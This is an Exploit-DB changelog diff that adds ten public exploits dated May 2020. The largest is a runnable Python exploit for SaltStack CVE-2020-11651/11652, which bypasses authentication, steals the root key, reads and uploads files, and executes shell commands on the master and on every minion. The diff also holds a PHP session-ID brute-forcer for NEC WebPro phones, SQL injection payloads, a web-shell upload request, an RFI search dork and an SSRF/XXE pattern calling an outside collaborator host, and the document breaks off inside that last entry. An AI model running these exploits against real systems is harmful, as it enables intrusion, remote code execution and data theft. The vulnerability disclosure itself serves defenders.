DB: 2020-05-06

10 changes to exploits/shellcodes

Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path

Saltstack 3000.1 - Remote Code Execution

BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
Fishing Reservation System 7.5 - 'uid' SQL Injection
Online Scheduling System 1.0 - 'username' SQL Injection
webERP 4.15.1 - Unauthenticated Backup File Access
PhreeBooks ERP 5.2.5 - Remote Command Execution
SimplePHPGal 0.7 - Remote File Inclusion
NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration

exploits/hardware/webapps/48425.txt

@@ -0,0 +1,63 @@
+# Title: NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration 
+# Author: Cold z3ro
+# Date: 2020-05-04
+# Homepage: https://www.0x30.cc/
+# Vendor Homepage: https://www.nec.com
+# Version: 01.03.01
+# Discription: NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration 
+
+<?php
+set_time_limit(0);
+
+$host = "192.168.0.14";
+
+$start = 100;
+$end = 30000;
+$maxproc= 50;
+$execute=0;
+
+echo "\n[+] NEC SL2100 (NEC Electra Elite IPK II WebPro) Session Enumeration\n\n";
+sleep(3);
+for ($i = $start; $i <= $end; $i++) 
+{
+
+	$pid = @pcntl_fork();
+	$execute++;
+	if ($execute >= $maxproc)
+	{
+		while (pcntl_waitpid(0, $status) != -1) 
+		{
+			$status = pcntl_wexitstatus($status);
+			$execute =0;
+			usleep(3000);
+		}
+	}
+	if (!$pid) 
+	{
+		echo $url . " checking $i\n";
+		login($url, $i);
+		flush();
+		exit; 
+	}
+}
+
+
+function login($url, $key)
+{
+	$ch = curl_init();
+	curl_setopt($ch, CURLOPT_URL, $url .'/PyxisUaMenu.htm?sessionId='.$key.'&MAINFRM(444,-1,591)#');
+	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+	curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80);
+	curl_setopt($ch, CURLOPT_TIMEOUT, 80);
+	curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
+	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
+	curl_setopt($ch, CURLOPT_HEADER, FALSE);
+	$content  = curl_exec($ch);
+	curl_close ($ch);
+	if(preg_match('/Telephone/i', $content) || preg_match('/Mailbox/i', $content))
+	{
+		die("\n\n[+][-]".$url."/PyxisUaMenu.htm?sessionId=".$key."&MAINFRM(444,-1,591)# => Found\n\n");
+		
+	}
+}

exploits/multiple/remote/48421.txt

@@ -0,0 +1,393 @@
+# Exploit Title: Saltstack 3000.1 - Remote Code Execution
+# Date: 2020-05-04
+# Exploit Author: Jasper Lievisse Adriaanse
+# Vendor Homepage: https://www.saltstack.com/
+# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
+# Tested on: Debian 10 with Salt 2019.2.0
+# CVE : CVE-2020-11651 and CVE-2020-11652
+# Discription: Saltstack authentication bypass/remote code execution
+#
+# Source: https://github.com/jasperla/CVE-2020-11651-poc
+# This exploit is based on this checker script:
+# https://github.com/rossengeorgiev/salt-security-backports
+
+#!/usr/bin/env python
+#
+# Exploit for CVE-2020-11651 and CVE-2020-11652
+# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)
+# This exploit is based on this checker script:
+# https://github.com/rossengeorgiev/salt-security-backports
+
+from __future__ import absolute_import, print_function, unicode_literals
+import argparse
+import datetime
+import os
+import os.path
+import sys
+import time
+
+import salt
+import salt.version
+import salt.transport.client
+import salt.exceptions
+
+def init_minion(master_ip, master_port):
+    minion_config = {
+        'transport': 'zeromq',
+        'pki_dir': '/tmp',
+        'id': 'root',
+        'log_level': 'debug',
+        'master_ip': master_ip,
+        'master_port': master_port,
+        'auth_timeout': 5,
+        'auth_tries': 1,
+        'master_uri': 'tcp://{0}:{1}'.format(master_ip, master_port)
+    }
+
+    return salt.transport.client.ReqChannel.factory(minion_config, crypt='clear')
+
+# --- check funcs ----
+
+def check_salt_version():
+  print("[+] Salt version: {}".format(salt.version.__version__))
+
+  vi = salt.version.__version_info__
+
+  if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):
+     return True
+  else:
+     return False
+
+def check_connection(master_ip, master_port, channel):
+  print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
+  sys.stdout.flush()
+
+  # connection check
+  try:
+    channel.send({'cmd':'ping'}, timeout=2)
+  except salt.exceptions.SaltReqTimeoutError:
+    print("OFFLINE")
+    sys.exit(1)
+  else:
+    print("ONLINE")
+
+def check_CVE_2020_11651(channel):
+  print("[+] Checking if vulnerable to CVE-2020-11651... ", end='')
+  sys.stdout.flush()
+  # try to evil
+  try:
+    rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
+  except salt.exceptions.SaltReqTimeoutError:
+    print("YES")
+  except:
+    print("ERROR")
+    raise
+  else:
+      pass
+  finally:
+    if rets:
+      root_key = rets[2]['root']
+      return root_key
+
+  return None
+
+def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):
+  print("[+] Checking if vulnerable to CVE-2020-11652 (read_token)... ", end='')
+  sys.stdout.flush()
+
+  # try read file
+  msg = {
+    'cmd': 'get_token',
+    'arg': [],
+    'token': top_secret_file_path,
+  }
+
+  try:
+    rets = channel.send(msg, timeout=3)
+  except salt.exceptions.SaltReqTimeoutError:
+    print("YES")
+  except:
+    print("ERROR")
+    raise
+  else:
+    if debug:
+      print()
+      print(rets)
+    print("NO")
+  
+def check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key):
+  print("[+] Checking if vulnerable to CVE-2020-11652 (read)... ", end='')
+  sys.stdout.flush()
+
+  # try read file
+  msg = {
+    'key': root_key,
+    'cmd': 'wheel',
+    'fun': 'file_roots.read',
+    'path': top_secret_file_path,
+    'saltenv': 'base',
+  }
+
+  try:
+    rets = channel.send(msg, timeout=3)
+  except salt.exceptions.SaltReqTimeoutError:
+    print("TIMEOUT")
+  except:
+    print("ERROR")
+    raise
+  else:
+    if debug:
+      print()
+      print(rets)
+    if rets['data']['return']:
+      print("YES")
+    else:
+      print("NO")
+
+def check_CVE_2020_11652_write1(debug, channel, root_key):
+  print("[+] Checking if vulnerable to CVE-2020-11652 (write1)... ", end='')
+  sys.stdout.flush()
+
+  # try read file
+  msg = {
+    'key': root_key,
+    'cmd': 'wheel',
+    'fun': 'file_roots.write',
+    'path': '../../../../../../../../tmp/salt_CVE_2020_11652',
+    'data': 'evil',
+    'saltenv': 'base',
+  }
+
+  try:
+    rets = channel.send(msg, timeout=3)
+  except salt.exceptions.SaltReqTimeoutError:
+    print("TIMEOUT")
+  except:
+    print("ERROR")
+    raise
+  else:
+    if debug:
+      print()
+      print(rets)
+
+    pp(rets)
+    if rets['data']['return'].startswith('Wrote'):
+      try:
+        os.remove('/tmp/salt_CVE_2020_11652')
+      except OSError:
+        print("Maybe?")
+      else:
+        print("YES")
+    else:
+      print("NO")
+
+def check_CVE_2020_11652_write2(debug, channel, root_key):
+  print("[+] Checking if vulnerable to CVE-2020-11652 (write2)... ", end='')
+  sys.stdout.flush()
+
+  # try read file
+  msg = {
+    'key': root_key,
+    'cmd': 'wheel',
+    'fun': 'config.update_config',
+    'file_name': '../../../../../../../../tmp/salt_CVE_2020_11652',
+    'yaml_contents': 'evil',
+    'saltenv': 'base',
+  }
+
+  try:
+    rets = channel.send(msg, timeout=3)
+  except salt.exceptions.SaltReqTimeoutError:
+    print("TIMEOUT")
+  except:
+    print("ERROR")
+    raise
+  else:
+    if debug:
+      print()
+      print(rets)
+    if rets['data']['return'].startswith('Wrote'):
+      try:
+        os.remove('/tmp/salt_CVE_2020_11652.conf')
+      except OSError:
+        print("Maybe?")
+      else:
+        print("YES")
+    else:
+      print("NO")
+
+def pwn_read_file(channel, root_key, path, master_ip):
+    print("[+] Attemping to read {} from {}".format(path, master_ip))
+    sys.stdout.flush()
+
+    msg = {
+        'key': root_key,
+        'cmd': 'wheel',
+        'fun': 'file_roots.read',
+        'path': path,
+        'saltenv': 'base',
+    }
+
+    rets = channel.send(msg, timeout=3)
+    print(rets['data']['return'][0][path])
+
+def pwn_upload_file(channel, root_key, src, dest, master_ip):
+    print("[+] Attemping to upload {} to {} on {}".format(src, dest, master_ip))
+    sys.stdout.flush()
+
+    try:
+        fh = open(src, 'rb')
+        payload = fh.read()
+        fh.close()
+    except Exception as e:
+        print('[-] Failed to read {}: {}'.format(src, e))
+        return
+
+    msg = {
+        'key': root_key,
+        'cmd': 'wheel',
+        'fun': 'file_roots.write',
+        'saltenv': 'base',
+        'data': payload,
+        'path': dest,
+    }
+
+    rets = channel.send(msg, timeout=3)
+    print('[ ] {}'.format(rets['data']['return']))
+
+def pwn_exec(channel, root_key, cmd, master_ip, jid):
+    print("[+] Attemping to execute {} on {}".format(cmd, master_ip))
+    sys.stdout.flush()
+
+    msg = {
+        'key': root_key,
+        'cmd': 'runner',
+        'fun': 'salt.cmd',
+        'saltenv': 'base',
+        'user': 'sudo_user',
+        'kwarg': {
+            'fun': 'cmd.exec_code',
+            'lang': 'python',
+            'code': "import subprocess;subprocess.call('{}',shell=True)".format(cmd)
+        },
+        'jid': jid,
+    }
+
+    try:
+        rets = channel.send(msg, timeout=3)
+    except Exception as e:
+        print('[-] Failed to submit job')
+        return
+
+    if rets.get('jid'):
+        print('[+] Successfully scheduled job: {}'.format(rets['jid']))
+
+def pwn_exec_all(channel, root_key, cmd, master_ip, jid):
+    print("[+] Attemping to execute '{}' on all minions connected to {}".format(cmd, master_ip))
+    sys.stdout.flush()
+
+    msg = {
+        'key': root_key,
+        'cmd': '_send_pub',
+        'fun': 'cmd.run',
+        'user': 'root',
+        'arg': [ "/bin/sh -c '{}'".format(cmd) ],
+        'tgt': '*',
+        'tgt_type': 'glob',
+        'ret': '',
+        'jid': jid
+    }
+
+    try:
+        rets = channel.send(msg, timeout=3)
+    except Exception as e:
+        print('[-] Failed to submit job')
+        return
+    finally:
+        if rets == None:
+            print('[+] Successfully submitted job to all minions.')
+        else:
+            print('[-] Failed to submit job')
+
+
+def main():
+    parser = argparse.ArgumentParser(description='Saltstack exploit for CVE-2020-11651 and CVE-2020-11652')
+    parser.add_argument('--master', '-m', dest='master_ip', default='127.0.0.1')
+    parser.add_argument('--port', '-p', dest='master_port', default='4506')
+    parser.add_argument('--force', '-f', dest='force', default=False, action='store_false')
+    parser.add_argument('--debug', '-d', dest='debug', default=False, action='store_true')
+    parser.add_argument('--run-checks', '-c', dest='run_checks', default=False, action='store_true')
+    parser.add_argument('--read', '-r', dest='read_file')
+    parser.add_argument('--upload-src', dest='upload_src')
+    parser.add_argument('--upload-dest', dest='upload_dest')
+    parser.add_argument('--exec', dest='exec', help='Run a command on the master')
+    parser.add_argument('--exec-all', dest='exec_all', help='Run a command on all minions')
+    args = parser.parse_args()
+
+    print("[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.")
+    time.sleep(1)
+
+    # Both src and destination are required for uploads
+    if (args.upload_src and args.upload_dest is None) or (args.upload_dest and args.upload_src is None):
+        print('[-] Must provide both --upload-src and --upload-dest')
+        sys.exit(1)
+
+    channel = init_minion(args.master_ip, args.master_port)
+
+    if check_salt_version():
+       print("[ ] This version of salt is vulnerable! Check results below")
+    elif args.force:
+       print("[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.")
+    else:
+       sys.exit()
+
+    check_connection(args.master_ip, args.master_port, channel)
+    
+    root_key = check_CVE_2020_11651(channel)
+    if root_key:
+        print('\n[*] root key obtained: {}'.format(root_key))
+    else:
+        print('[-] Failed to find root key...aborting')
+        sys.exit(127)
+
+    if args.run_checks:
+        # Assuming this check runs on the master itself, create a file with "secret" content
+        # and abuse CVE-2020-11652 to read it.
+        top_secret_file_path = '/tmp/salt_cve_teta'
+        with salt.utils.fopen(top_secret_file_path, 'w') as fd:
+            fd.write("top secret")
+
+        # Again, this assumes we're running this check on the master itself
+        with salt.utils.fopen('/var/cache/salt/master/.root_key') as keyfd:
+            root_key = keyfd.read()
+
+        check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path)
+        check_CVE_2020_11652_read(debug, channel, top_secret_file_path, root_key)
+        check_CVE_2020_11652_write1(debug, channel, root_key)
+        check_CVE_2020_11652_write2(debug, channel, root_key)
+        os.remove(top_secret_file_path)
+        sys.exit(0)
+
+    if args.read_file:
+        pwn_read_file(channel, root_key, args.read_file, args.master_ip)
+
+    if args.upload_src:
+        if os.path.isabs(args.upload_dest):
+            print('[-] Destination path must be relative; aborting')
+            sys.exit(1)
+        pwn_upload_file(channel, root_key, args.upload_src, args.upload_dest, args.master_ip)
+
+
+    jid = '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.utcnow())
+
+    if args.exec:
+        pwn_exec(channel, root_key, args.exec, args.master_ip, jid)
+
+    if args.exec_all:
+        print("[!] Lester, is this what you want? Hit ^C to abort.")
+        time.sleep(2)
+        pwn_exec_all(channel, root_key, args.exec_all, args.master_ip, jid)
+
+
+if __name__ == '__main__':
+    main()

exploits/php/webapps/48413.txt

@@ -32,10 +32,3 @@ Parameter file: /scp/slass.php
 I used the name of the SLA for any ticket.
 
 ## Risk : cookie information of the target user is obtained.
-
-# Bu e-posta mesajı ve eklerinde yer alan içerikler gönderildiği kişi ya da firmaya özeldir. Ayrıca hukuken de gizli olabilir. Hiçbir şekilde üçüncü kişilere açıklanamaz ve yayınlanamaz. 
-# Eğer bu mesajı hataen aldıysanız lütfen durumu gönderen kişiye derhal bildiriniz ve mesajı sisteminizden siliniz. Mesajın yetkili alıcısı değilseniz hiçbir kısmını kopyalayamaz, başkasına 
-# gönderemez veya hiçbir şekilde bu mesajı kullanamazsınız. Eğer mesajın yetkili alıcısı veya yetkili alıcısına iletmekten sorumlu kişi siz değilseniz, lütfen mesajı sisteminizden siliniz 
-# ve göndereni uyarınız. İnternet iletişiminde tam güvenlik ve hatasız gönderim garanti edilemeyeceğinden; mesajın yerine ulaşmaması, geç ulaşması ya da içeriğinin bozulması gibi problemler 
-# de oluşabilir. Gönderen ve GAİS (Gais Siber Güvenlik Teknolojileri Ltd. Şti.) bu mesajın içerdiği bilgilerin doğruluğu, bütünlüğü ve güncelliği konusunda bir garanti vermemektedir. 
-# Mesajın içeriğinden, iletilmesinden, alınmasından, saklanmasından, gizliliğinin korunmamasından, virüs içermesinden ve sisteminizde yaratabileceği olası zararlardan GAİS sorumlu tutulamaz.

exploits/php/webapps/48417.txt

@@ -0,0 +1,143 @@
+# Title: Fishing Reservation System 7.5 - 'uid' SQL Injection
+# Author: Vulnerability Laboratory
+# Date: 2020-05-05
+# Vendor: https://fishingreservationsystem.com/index.html
+# Software: https://fishingreservationsystem.com/features.htm
+# CVE: N/A
+
+Document Title:
+===============
+Fishing Reservation System - Multiple Remote SQL Injection Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2243
+
+
+Common Vulnerability Scoring System:
+====================================
+7.5
+
+
+Product & Service Introduction:
+===============================
+(Copy of the Homepage: https://fishingreservationsystem.com/index.html
+&  https://fishingreservationsystem.com/features.htm )
+
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-04: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+Multiple remote sql-injection web vulnerabilities has been discovered in
+the official Fishing Reservation System application.
+The vulnerability allows remote attackers to inject or execute own sql
+commands to compromise the dbms or file system of the application.
+
+The remote sql injection web vulnerabilites are located in the pid, type
+and uid parameters of the admin.php control panel file. Guest accounts or
+low privileged user accounts are able to inject and execute own
+malicious sql commands as statement to compromise the local database and
+affected
+management system. The request method to inject/execute is GET and the
+attack vector is client-side. The vulnerability is a classic order by
+remote
+sql injection web vulnerability.
+
+Exploitation of the remote sql injection vulnerability requires no user
+interaction and a low privileged web-application user / guest account.
+Successful exploitation of the remote sql injection results in database
+management system, web-server and web-application compromise.
+
+Request Method(s):
+[+] GET
+
+Vulnerable File(s):
+[+] cart.php
+[+] calender.php
+[+] admin.php
+
+Vulnerable Parameter(s):
+[+] uid
+[+] pid
+[+] type
+[+] m
+[+] y
+[+] code
+
+
+Proof of Concept (PoC):
+=======================
+The remote sql-injection web vulnerability can be exploited by remote
+attackers with guest access or low privileged user account and without
+user interaction action.
+For security demonstration or to reproduce the remote sql injection web
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Example
+https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid='[SQL-INJECTION!]--
+https://frs.localhost:8080/system/admin.php?page=product/edit&type='[SQL-INJECTION!]--
+https://frs.localhost:8080/system/admin.php?page=user/edit&uid='[SQL-INJECTION!]--&PHPSESSID=
+-
+https://frs.localhost:8080/system/calendar.php?m='[SQL-INJECTION!]--&y=20&PHPSESSID=
+https://frs.localhost:8080/system/calendar.php?m=02&y='[SQL-INJECTION!]--&PHPSESSID=
+https://frs.localhost:8080/system/modules/cart.php?code='[SQL-INJECTION!]--&PHPSESSID=
+
+
+PoC: Exploitation (SQL-Injection)
+https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
+https://frs.localhost:8080/system/admin.php?page=product/edit&type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID=
+https://frs.localhost:8080/system/admin.php?page=user/edit&uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
+-
+https://frs.localhost:8080/system/calendar.php?m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID=
+https://frs.localhost:8080/system/calendar.php?m=02&y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
+https://frs.localhost:8080/system/modules/cart.php?code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID=
+
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>Fishing Reservation System - SQL INJECTION EXPLOIT (PoC)</title>
+<iframe
+src="https://frs.localhost:8080/system/admin.php?page=product/edit&type=s&
+pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20>
+<iframe src="https://frs.localhost:8080/system/admin.php?page=product/edit&
+type=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&pid=2&PHPSESSID="%20>
+<iframe src="https://frs.localhost:8080/system/admin.php?page=user/edit&
+uid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20>
+<br>-
+<iframe src="https://frs.localhost:8080/system/calendar.php?
+m=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&y=20&PHPSESSID="%20>
+<iframe src="https://frs.localhost:8080/system/calendar.php?m=02&
+y=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20>
+<iframe src="https://frs.localhost:8080/system/modules/cart.php?
+code=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,@@version--&PHPSESSID="%20>
+</body></head>
+</html>
+
+
+Reference(s):
+https://frs.localhost:8080/
+https://frs.localhost:8080/system/
+https://frs.localhost:8080/system/modules/
+https://frs.localhost:8080/system/admin.php
+https://frs.localhost:8080/system/modules/cart.php
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM

exploits/php/webapps/48419.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Online Scheduling System 1.0 - 'username' SQL Injection
+# Date: 2020-05-04
+# Exploit Author: Saurav Shukla
+# Vendor Homepage: https://www.sourcecodester.com/php/14168/online-scheduling-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: username
+# Injected Request
+POST /oss/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 55
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/oss/Register.php
+Cookie: PHPSESSID=091v1e2g6109rrbduk924psea9
+Upgrade-Insecure-Requests: 1
+
+username=admin' and sleep(50)--+&password=admin&lgn=Add

exploits/php/webapps/48420.txt

@@ -0,0 +1,26 @@
+# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
+# Date: 2020-05-01
+# Author: Besim ALTINOK
+# Vendor Homepage: http://www.weberp.org
+# Software Link: https://sourceforge.net/projects/web-erp/
+# Version: v4.15.1
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+--------------------------------------------------------------------------
+About Software:
+
+webERP is a complete web-based accounting and business management system
+that requires only a web-browser and pdf reader to use. It has a wide range
+of features suitable for many businesses particularly distributed
+businesses in wholesale, distribution, and manufacturing.
+
+-------------------------------------------------------
+PoC Unauthenticated Backup File Access
+---------------------------------------------
+
+1- This file generates new Backup File:
+http://localhost/webERP/BackUpDatabase.php
+2- Someone can download the backup file from:
+-- 
+http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz

exploits/php/webapps/48423.txt

@@ -0,0 +1,50 @@
+# Exploit Title: PhreeBooks ERP 5.2.5 - Remote Command Execution
+# Date: 2020-05-01
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.phreesoft.com/
+# Software Link: https://sourceforge.net/projects/phreebooks/
+# Version: v5.2.4, v5.2.5
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+-------------------------------------------------------------------------------------
+
+There are no file extension controls on Image Manager (5.2.4) and on Backup
+Restore. If an authorized user is obtained, it is possible to run a
+malicious PHP file on the server.
+--------------------------------------------------------------------------------------
+
+One of the Vulnerable File: (backup.php)
+-----------------------------------------
+
+RCE PoC (Upload Process)
+--------------------------------------------------------------------------------------
+
+POST /pblast/index.php?&p=bizuno/backup/uploadRestore HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 *********************
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pblast/index.php?&p=bizuno/backup/managerRestore
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------39525038724866743160620170
+Content-Length: 231
+DNT: 1
+Connection: close
+Cookie: **************************************************
+
+-----------------------------39525038724866743160620170
+Content-Disposition: form-data; name="fldFile"; filename="shell.php"
+Content-Type: text/php
+
+<? phpinfo(); ?>
+
+-----------------------------39525038724866743160620170--
+
+
+
+Shell directory:
+-------------------------------
+- http://localhost/pblast/myFiles/backups/shell.php

exploits/php/webapps/48424.txt

@@ -0,0 +1,59 @@
+# Title: SimplePHPGal 0.7 - Remote File Inclusion 
+# Author: h4shur
+# date:2020-05-05
+# Vendor Homepage: https://johncaruso.ca
+# Software Link: https://johncaruso.ca/phpGallery/
+# Software Link: https://sourceforge.net/projects/simplephpgal/
+# Tested on: Windows 10 & Google Chrome
+# Category : Web Application Bugs
+# Dork : intext:"Created with Simple PHP Photo Gallery"
+         intext:"Created by John Caruso"
+
+
+### Note:
+
+* Another web application bug is the RFI bug, which can be very dangerous
+And stands for Remote File Inclusion, which directly executes loose scripts on the server
+Also, this security hole is created by programmer errors
+And you must be fluent in programming language to secure and prevent this bug
+And you have to control the inputs of the application and use powerful firewalls
+
+* This bug is one of the most dangerous bugs and the access that the intruder can gain using this bug is the implementation of Shell script
+In fact, by running Shell script, it will have relatively complete access to the Target site server
+If we want to explain it in text, the hacker will execute the shell by giving a link from Shell script in txt format to the input of the vulnerable site.
+
+* what's the solution ?
+Check the file entered by the user from a list and enter it if the file was in the list. Example :
+<?php
+$files=array('test.gif');
+if(in_array($_GET['file'], $files)){
+include ($_GET['file']);
+}
+?>
+* If you are a server administrator, turn off allow_url_fopen from the file.
+
+* Or do it with the ini_set command. Only for (RFI)
+<?php
+ini_set('allow_url_fopen ', 'Off');
+?>
+
+* We can use the strpos command to check that if the address is: // http, the file will not be enclosed (it can only block RFI)
+<?php
+$strpos = strpos($_GET['url'],'http://');
+if(!$strpos){
+include($_GET['url']);
+}
+?>
+
+* Using str_replace we can give the given address from two characters "/", "." Let's clean up.
+<?php
+$url=$_GET['url'];
+$url = str_replace("/", "", $url);
+$url = str_replace(".", "", $url);
+include($url);
+?>
+
+
+### Poc  :  
+
+[+]   site.com/image.php?img= [ PAYLOAD ]

exploits/windows/local/48418.txt

@@ -0,0 +1,74 @@
+# Exploit Title: Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path
+# Discovery by: Nguyen Khang - SunCSR
+# Discovery Date: 2020-05-03
+# Vendor Homepage:  https://www.oracle.com/
+# Software Link: https://www.oracle.com/database/technologies/112010-win64soft.html
+# Tested Version: 11g release 2
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 10.0.18363 N/A Build 18363
+
+# Step to discover Unquoted Service Path:
+
+C:\Users\cm0s>wmic service get name,pathname,displayname,startmode |
+findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+OracleDBConsoleorcl OracleDBConsoleorcl
+C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe Auto
+OracleOraDb11g_home1TNSListener OracleOraDb11g_home1TNSListener
+C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR Auto
+OracleServiceORCL OracleServiceORCL
+c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL Auto
+
+C:\Users\cm0s>sc qc OracleDBConsoleorcl
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: OracleDBConsoleorcl
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   :
+C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : OracleDBConsoleorcl
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+C:\Users\cm0s>sc qc OracleOraDb11g_home1TNSListener
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: OracleOraDb11g_home1TNSListener
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Oracle\product\11.2.0\dbhome_1\BIN\TNSLSNR
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : OracleOraDb11g_home1TNSListener
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\cm0s>sc qc OracleServiceORCL
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: OracleServiceORCL
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   :
+c:\oracle\product\11.2.0\dbhome_1\bin\ORACLE.EXE ORCL
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : OracleServiceORCL
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+# Exploit:
+# A successful attempt would require the local user to be able to insert
+# their code in the system root path
+# undetected by the OS or other security applications where it could
+# potentially be executed during
+# application startup or reboot. If successful, the local user's code would
+# execute with the elevated
+# privileges of the application.

exploits/xml/webapps/48422.txt

@@ -0,0 +1,61 @@
+# Title: BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection
+# Author: Daniel Martinez Adan (aDoN90)
+# Date: 2020-05-01
+# Homepage: https://blogengine.io/
+# Software Link: https://blogengine.io/support/download/
+# Affected Versions: 3.3
+# Vulnerability: XML External Entity (XXE OOB) Injection Vulnerability
+# Severity: High
+# Status: Fixed
+# Author: Daniel Martinez Adan (aDoN90)
+# CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H
+
+Technical Details
+--------------------
+
+Url: http://websiteurl-blogengine3.3/syndication.axd
+Parameter Name: apml
+Parameter Type: GET
+
+*Attack Pattern 1 (SSRF HTTP Interaction) :*
+
+http://websiteurl-blogengine3.3/syndication.axd?apml=http://hav4zt9bu9ihxzvcg59lqfapzg5it7.burpcollaborator.net
+
+*Attack Pattern 2 (SSRF to XXE HTTP Interaction):*
+
